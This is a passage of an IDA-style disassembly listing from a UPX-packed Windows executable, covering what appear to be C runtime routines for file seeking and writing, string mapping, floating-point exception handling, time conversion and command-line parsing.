jl short loc_42250E
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_42250E: ; CODE XREF: sub_4224ED+12�j
pop esi
retn
sub_4224ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422510 proc near ; CODE XREF: sub_41C955+40�p
; sub_42205D+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_41CC41
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_42254F
mov ecx, 2
loc_42254F: ; CODE XREF: sub_422510+38�j
push ecx
call sub_41CC41
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_422510 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42255C proc near ; CODE XREF: sub_421DB1:loc_421F53�j
; sub_4220FB:loc_42210C�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004247C0 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427908
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:dword_4DBA08
test eax, eax
jz short loc_4225A4
mov [ebp+var_4], 1
call eax
jmp short loc_4225A0
; ---------------------------------------------------------------------------
loc_422599: ; DATA XREF: UPX0:00427918�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_42259D: ; DATA XREF: UPX0:0042791C�o
mov esp, [ebp+var_18]
loc_4225A0: ; CODE XREF: sub_42255C+3B�j
and [ebp+var_4], 0
loc_4225A4: ; CODE XREF: sub_42255C+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_4225AD: ; DATA XREF: UPX0:00427910�o
jmp loc_4247C0
sub_42255C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4225B2 proc near ; CODE XREF: sub_41CAF7+23�p
; sub_41CAF7:loc_41CB62�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427920
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_43CFA4
test eax, eax
jz short loc_4225FA
mov [ebp+var_4], 1
call eax ; sub_42255C
jmp short loc_4225F6
; ---------------------------------------------------------------------------
loc_4225EF: ; DATA XREF: UPX0:00427930�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4225F3: ; DATA XREF: UPX0:00427934�o
mov esp, [ebp+var_18]
loc_4225F6: ; CODE XREF: sub_4225B2+3B�j
and [ebp+var_4], 0
loc_4225FA: ; CODE XREF: sub_4225B2+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_422603: ; DATA XREF: UPX0:00427928�o
jmp sub_42255C
sub_4225B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422608 proc near ; CODE XREF: sub_41CFD3+7�p
; sub_41CFD3+26�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_4DCFE8
push esi
cmp eax, 3
jnz short loc_422631
mov esi, [ebp+arg_0]
push esi
call sub_41DE77
test eax, eax
pop ecx
jz short loc_42262E
mov eax, [esi-4]
sub eax, 9
jmp short loc_422666
; ---------------------------------------------------------------------------
loc_42262E: ; CODE XREF: sub_422608+1C�j
push esi
jmp short loc_422658
; ---------------------------------------------------------------------------
loc_422631: ; CODE XREF: sub_422608+E�j
cmp eax, 2
jnz short loc_422655
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_41EBD2
add esp, 0Ch
test eax, eax
jz short loc_422655
movzx eax, byte ptr [eax]
shl eax, 4
jmp short loc_422666
; ---------------------------------------------------------------------------
loc_422655: ; CODE XREF: sub_422608+2C�j
; sub_422608+43�j
push [ebp+arg_0]
loc_422658: ; CODE XREF: sub_422608+27�j
push 0
push ds:dword_4DCFE4
call dword_427058 ; RtlSizeHeap
loc_422666: ; CODE XREF: sub_422608+24�j
; sub_422608+4B�j
pop esi
leave
retn
sub_422608 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422669 proc near ; CODE XREF: sub_41D081+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_422725
cmp ebx, 8Ah
jg loc_422725
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_43D46C[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_4226A8
cmp edi, 2
jle short loc_4226A8
inc esi
loc_4226A8: ; CODE XREF: sub_422669+37�j
; sub_422669+3C�j
call sub_4247D7
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_43D388
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_42271B
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_422721
cmp dword_43D38C, 0
jz short loc_422721
lea eax, [ebp+var_24]
push eax
call sub_424A4A
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_422721
loc_42271B: ; CODE XREF: sub_422669+90�j
add ecx, dword_43D390
loc_422721: ; CODE XREF: sub_422669+96�j
; sub_422669+9F�j ...
mov eax, ecx
jmp short loc_422728
; ---------------------------------------------------------------------------
loc_422725: ; CODE XREF: sub_422669+13�j
; sub_422669+1F�j
or eax, 0FFFFFFFFh
loc_422728: ; CODE XREF: sub_422669+BA�j
pop ebx
leave
retn
sub_422669 endp
; =============== S U B R O U T I N E =======================================
sub_42272B proc near ; CODE XREF: sub_41D1EC+67�p
; sub_41F11C+1A2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, ds:dword_4DCDA0
push esi
push edi
jnb short loc_4227AD
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:4DCCA0h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_4227AD
push eax
call sub_4238A2
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_42276F
mov ds:dword_4DB958, 9
jmp short loc_4227BE
; ---------------------------------------------------------------------------
loc_42276F: ; CODE XREF: sub_42272B+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call dword_42711C ; SetFilePointer
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_42278F
call dword_42708C ; RtlGetLastWin32Error
jmp short loc_422791
; ---------------------------------------------------------------------------
loc_42278F: ; CODE XREF: sub_42272B+5A�j
xor eax, eax
loc_422791: ; CODE XREF: sub_42272B+62�j
test eax, eax
jz short loc_42279E
push eax
call sub_4203DF
pop ecx
jmp short loc_4227BE
; ---------------------------------------------------------------------------
loc_42279E: ; CODE XREF: sub_42272B+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_4227C1
; ---------------------------------------------------------------------------
loc_4227AD: ; CODE XREF: sub_42272B+D�j
; sub_42272B+2A�j
and ds:dword_4DB95C, 0
mov ds:dword_4DB958, 9
loc_4227BE: ; CODE XREF: sub_42272B+42�j
; sub_42272B+71�j
or eax, 0FFFFFFFFh
loc_4227C1: ; CODE XREF: sub_42272B+80�j
pop edi
pop esi
pop ebx
retn
sub_42272B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4227C5 proc near ; CODE XREF: sub_41D1EC+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_4227E1
mov [edi+4], ebx
loc_4227E1: ; CODE XREF: sub_4227C5+17�j
push 1
push ebx
push esi
call sub_42272B
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_42284F
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_422806
sub eax, [edi+4]
jmp loc_422918
; ---------------------------------------------------------------------------
loc_422806: ; CODE XREF: sub_4227C5+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_422840
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, ds:dword_4DCCA0[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_422857
mov edx, ecx
loc_422831: ; CODE XREF: sub_4227C5+79�j
cmp edx, eax
jnb short loc_422857
cmp byte ptr [edx], 0Ah
jnz short loc_42283D
inc [ebp+var_8]
loc_42283D: ; CODE XREF: sub_4227C5+73�j
inc edx
jmp short loc_422831
; ---------------------------------------------------------------------------
loc_422840: ; CODE XREF: sub_4227C5+50�j
test dl, 80h
jnz short loc_422857
mov ds:dword_4DB958, 16h
loc_42284F: ; CODE XREF: sub_4227C5+2D�j
or eax, 0FFFFFFFFh
jmp loc_422918
; ---------------------------------------------------------------------------
loc_422857: ; CODE XREF: sub_4227C5+68�j
; sub_4227C5+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_422865
mov eax, [ebp+var_8]
jmp loc_422918
; ---------------------------------------------------------------------------
loc_422865: ; CODE XREF: sub_4227C5+96�j
test byte ptr [edi+0Ch], 1
jz loc_422910
mov edx, [edi+4]
test edx, edx
jnz short loc_42287E
and [ebp+var_8], edx
jmp loc_422910
; ---------------------------------------------------------------------------
loc_42287E: ; CODE XREF: sub_4227C5+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4DCCA0h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_42290A
push 2
push 0
push [ebp+var_C]
call sub_42272B
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_4228D1
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_4228BC: ; CODE XREF: sub_4227C5+104�j
cmp eax, ecx
jnb short loc_4228CB
cmp byte ptr [eax], 0Ah
jnz short loc_4228C8
inc [ebp+arg_0]
loc_4228C8: ; CODE XREF: sub_4227C5+FE�j
inc eax
jmp short loc_4228BC
; ---------------------------------------------------------------------------
loc_4228CB: ; CODE XREF: sub_4227C5+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_422905
; ---------------------------------------------------------------------------
loc_4228D1: ; CODE XREF: sub_4227C5+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_42272B
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_4228F8
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_4228F8
test ch, 4
jz short loc_4228FB
loc_4228F8: ; CODE XREF: sub_4227C5+124�j
; sub_4227C5+12C�j
mov eax, [edi+18h]
loc_4228FB: ; CODE XREF: sub_4227C5+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_422905: ; CODE XREF: sub_4227C5+10A�j
jz short loc_42290A
inc [ebp+arg_0]
loc_42290A: ; CODE XREF: sub_4227C5+D9�j
; sub_4227C5:loc_422905�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_422910: ; CODE XREF: sub_4227C5+A4�j
; sub_4227C5+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_422918: ; CODE XREF: sub_4227C5+3C�j
; sub_4227C5+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4227C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42291D proc near ; CODE XREF: sub_41D2B4+A2�p
; sub_41DB8B+2C�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, ds:dword_4DCDA0
push esi
push edi
jnb loc_422AB1
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:4DCCA0h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_422AB1
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_42296E
loc_422967: ; CODE XREF: sub_42291D+177�j
xor eax, eax
jmp loc_422AC5
; ---------------------------------------------------------------------------
loc_42296E: ; CODE XREF: sub_42291D+48�j
test al, 20h
jz short loc_42297E
push 2
push edi
push ecx
call sub_42272B
add esp, 0Ch
loc_42297E: ; CODE XREF: sub_42291D+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_422A4D
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_422A85
loc_42299E: ; CODE XREF: sub_42291D+F5�j
lea eax, [ebp+var_414]
loc_4229A4: ; CODE XREF: sub_42291D+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_4229D8
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_4229C3
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_4229C3: ; CODE XREF: sub_42291D+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_4229A4
loc_4229D8: ; CODE XREF: sub_42291D+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_4270E0 ; WriteFile
test eax, eax
jz short loc_422A42
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_422A14
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_42299E
loc_422A14: ; CODE XREF: sub_42291D+EA�j
; sub_42291D+12E�j
xor edi, edi
loc_422A16: ; CODE XREF: sub_42291D+150�j
; sub_42291D+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_422AAC
cmp [ebp+arg_0], edi
jz short loc_422A85
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_422A7A
mov ds:dword_4DB958, 9
mov ds:dword_4DB95C, eax
jmp loc_422AC2
; ---------------------------------------------------------------------------
loc_422A42: ; CODE XREF: sub_42291D+E0�j
call dword_42708C ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_422A14
; ---------------------------------------------------------------------------
loc_422A4D: ; CODE XREF: sub_42291D+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_4270E0 ; WriteFile
test eax, eax
jz short loc_422A6F
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_422A16
; ---------------------------------------------------------------------------
loc_422A6F: ; CODE XREF: sub_42291D+145�j
call dword_42708C ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_422A16
; ---------------------------------------------------------------------------
loc_422A7A: ; CODE XREF: sub_42291D+10F�j
push [ebp+arg_0]
call sub_4203DF
pop ecx
jmp short loc_422AC2
; ---------------------------------------------------------------------------
loc_422A85: ; CODE XREF: sub_42291D+7B�j
; sub_42291D+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_422A9A
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_422967
loc_422A9A: ; CODE XREF: sub_42291D+16F�j
mov ds:dword_4DB958, 1Ch
mov ds:dword_4DB95C, edi
jmp short loc_422AC2
; ---------------------------------------------------------------------------
loc_422AAC: ; CODE XREF: sub_42291D+FE�j
sub eax, [ebp+var_10]
jmp short loc_422AC5
; ---------------------------------------------------------------------------
loc_422AB1: ; CODE XREF: sub_42291D+15�j
; sub_42291D+37�j
and ds:dword_4DB95C, 0
mov ds:dword_4DB958, 9
loc_422AC2: ; CODE XREF: sub_42291D+120�j
; sub_42291D+166�j ...
or eax, 0FFFFFFFFh
loc_422AC5: ; CODE XREF: sub_42291D+4C�j
; sub_42291D+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_42291D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422ACA proc near ; CODE XREF: sub_41D5AA+47�p
; sub_41D5AA+74�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427940
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_4DBA2C, edi
jnz short loc_422B40
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_427938
mov esi, 100h
push esi
push edi
call dword_427050 ; LCMapStringW
test eax, eax
jz short loc_422B1E
mov ds:dword_4DBA2C, ebx
jmp short loc_422B40
; ---------------------------------------------------------------------------
loc_422B1E: ; CODE XREF: sub_422ACA+4A�j
push edi
push edi
push ebx
push offset dword_4CB50C
push esi
push edi
call dword_427054 ; LCMapStringA
test eax, eax
jz loc_422C58
mov ds:dword_4DBA2C, 2
loc_422B40: ; CODE XREF: sub_422ACA+2E�j
; sub_422ACA+52�j
cmp [ebp+arg_C], edi
jle short loc_422B55
push [ebp+arg_C]
push [ebp+arg_8]
call sub_426180
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_422B55: ; CODE XREF: sub_422ACA+79�j
mov eax, ds:dword_4DBA2C
cmp eax, 2
jnz short loc_422B7C
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427054 ; LCMapStringA
jmp loc_422C5A
; ---------------------------------------------------------------------------
loc_422B7C: ; CODE XREF: sub_422ACA+93�j
cmp eax, 1
jnz loc_422C58
cmp [ebp+arg_18], edi
jnz short loc_422B92
mov eax, ds:dword_4DBA24
mov [ebp+arg_18], eax
loc_422B92: ; CODE XREF: sub_422ACA+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_427180 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_422C58
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_422BED
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_422BED: ; CODE XREF: sub_422ACA+10E�j
cmp [ebp+var_24], edi
jz short loc_422C58
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_427180 ; MultiByteToWideChar
test eax, eax
jz short loc_422C58
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427050 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_422C58
test byte ptr [ebp+arg_4+1], 4
jz short loc_422C6C
cmp [ebp+arg_14], edi
jz loc_422CE7
cmp esi, [ebp+arg_14]
jg short loc_422C58
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427050 ; LCMapStringW
test eax, eax
jnz loc_422CE7
loc_422C58: ; CODE XREF: sub_422ACA+66�j
; sub_422ACA+B5�j ...
xor eax, eax
loc_422C5A: ; CODE XREF: sub_422ACA+AD�j
; sub_422ACA+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_422C6C: ; CODE XREF: sub_422ACA+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_422CA0
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_422CA0: ; CODE XREF: sub_422ACA+1C2�j
cmp ebx, edi
jz short loc_422C58
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427050 ; LCMapStringW
test eax, eax
jz short loc_422C58
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_422CC7
push edi
push edi
jmp short loc_422CCD
; ---------------------------------------------------------------------------
loc_422CC7: ; CODE XREF: sub_422ACA+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_422CCD: ; CODE XREF: sub_422ACA+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_42717C ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_422C58
loc_422CE7: ; CODE XREF: sub_422ACA+165�j
; sub_422ACA+188�j
mov eax, esi
jmp loc_422C5A
sub_422ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422CEE proc near ; CODE XREF: UPX0:0041DA16�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_422E2F
test eax, eax
pop ecx
jz loc_422E23
mov ebx, [eax+8]
test ebx, ebx
jz loc_422E23
cmp ebx, 5
jnz short loc_422D1F
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_422E2C
; ---------------------------------------------------------------------------
loc_422D1F: ; CODE XREF: sub_422CEE+23�j
cmp ebx, 1
jz loc_422E1E
mov ecx, ds:dword_4DBA30
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov ds:dword_4DBA30, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_422E0E
mov ecx, dword_43D020
mov edx, dword_43D024
add edx, ecx
push esi
cmp ecx, edx
jge short loc_422D6E
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:43CFB0h[esi*4]
loc_422D65: ; CODE XREF: sub_422CEE+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_422D65
loc_422D6E: ; CODE XREF: sub_422CEE+69�j
mov eax, [eax]
mov esi, dword_43D02C
cmp eax, 0C000008Eh
jnz short loc_422D89
mov dword_43D02C, 83h
jmp short loc_422DF9
; ---------------------------------------------------------------------------
loc_422D89: ; CODE XREF: sub_422CEE+8D�j
cmp eax, 0C0000090h
jnz short loc_422D9C
mov dword_43D02C, 81h
jmp short loc_422DF9
; ---------------------------------------------------------------------------
loc_422D9C: ; CODE XREF: sub_422CEE+A0�j
cmp eax, 0C0000091h
jnz short loc_422DAF
mov dword_43D02C, 84h
jmp short loc_422DF9
; ---------------------------------------------------------------------------
loc_422DAF: ; CODE XREF: sub_422CEE+B3�j
cmp eax, 0C0000093h
jnz short loc_422DC2
mov dword_43D02C, 85h
jmp short loc_422DF9
; ---------------------------------------------------------------------------
loc_422DC2: ; CODE XREF: sub_422CEE+C6�j
cmp eax, 0C000008Dh
jnz short loc_422DD5
mov dword_43D02C, 82h
jmp short loc_422DF9
; ---------------------------------------------------------------------------
loc_422DD5: ; CODE XREF: sub_422CEE+D9�j
cmp eax, 0C000008Fh
jnz short loc_422DE8
mov dword_43D02C, 86h
jmp short loc_422DF9
; ---------------------------------------------------------------------------
loc_422DE8: ; CODE XREF: sub_422CEE+EC�j
cmp eax, 0C0000092h
jnz short loc_422DF9
mov dword_43D02C, 8Ah
loc_422DF9: ; CODE XREF: sub_422CEE+99�j
; sub_422CEE+AC�j ...
push dword_43D02C
push 8
call ebx
pop ecx
mov dword_43D02C, esi
pop ecx
pop esi
jmp short loc_422E16
; ---------------------------------------------------------------------------
loc_422E0E: ; CODE XREF: sub_422CEE+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_422E16: ; CODE XREF: sub_422CEE+11E�j
mov eax, [ebp+arg_0]
mov ds:dword_4DBA30, eax
loc_422E1E: ; CODE XREF: sub_422CEE+34�j
or eax, 0FFFFFFFFh
jmp short loc_422E2C
; ---------------------------------------------------------------------------
loc_422E23: ; CODE XREF: sub_422CEE+F�j
; sub_422CEE+1A�j
push [ebp+arg_4]
call dword_42704C ; UnhandledExceptionFilter
loc_422E2C: ; CODE XREF: sub_422CEE+2C�j
; sub_422CEE+133�j
pop ebx
pop ebp
retn
sub_422CEE endp
; =============== S U B R O U T I N E =======================================
sub_422E2F proc near ; CODE XREF: sub_422CEE+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_43D028
cmp dword_43CFA8, edx
push esi
mov eax, offset dword_43CFA8
jz short loc_422E5C
lea esi, [ecx+ecx*2]
lea esi, ds:43CFA8h[esi*4]
loc_422E51: ; CODE XREF: sub_422E2F+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_422E5C
cmp [eax], edx
jnz short loc_422E51
loc_422E5C: ; CODE XREF: sub_422E2F+16�j
; sub_422E2F+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43CFA8h[ecx*4]
cmp eax, ecx
jnb short loc_422E6F
cmp [eax], edx
jz short locret_422E71
loc_422E6F: ; CODE XREF: sub_422E2F+3A�j
xor eax, eax
locret_422E71: ; CODE XREF: sub_422E2F+3E�j
retn
sub_422E2F endp
; =============== S U B R O U T I N E =======================================
sub_422E72 proc near ; CODE XREF: UPX0:0041D9D8�p
cmp ds:dword_4DCFF4, 0
jnz short loc_422E80
call sub_42026D
loc_422E80: ; CODE XREF: sub_422E72+7�j
push esi
mov esi, ds:dword_4DCFEC
mov al, [esi]
cmp al, 22h
jnz short loc_422EB2
loc_422E8D: ; CODE XREF: sub_422E72+33�j
; sub_422E72+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_422EAA
test al, al
jz short loc_422EAA
movzx eax, al
push eax
call sub_424D36
test eax, eax
pop ecx
jz short loc_422E8D
inc esi
jmp short loc_422E8D
; ---------------------------------------------------------------------------
loc_422EAA: ; CODE XREF: sub_422E72+21�j
; sub_422E72+25�j
cmp byte ptr [esi], 22h
jnz short loc_422EBC
loc_422EAF: ; CODE XREF: sub_422E72+52�j
inc esi
jmp short loc_422EBC
; ---------------------------------------------------------------------------
loc_422EB2: ; CODE XREF: sub_422E72+19�j
cmp al, 20h
jbe short loc_422EBC
loc_422EB6: ; CODE XREF: sub_422E72+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_422EB6
loc_422EBC: ; CODE XREF: sub_422E72+3B�j
; sub_422E72+3E�j ...
mov al, [esi]
test al, al
jz short loc_422EC6
cmp al, 20h
jbe short loc_422EAF
loc_422EC6: ; CODE XREF: sub_422E72+4E�j
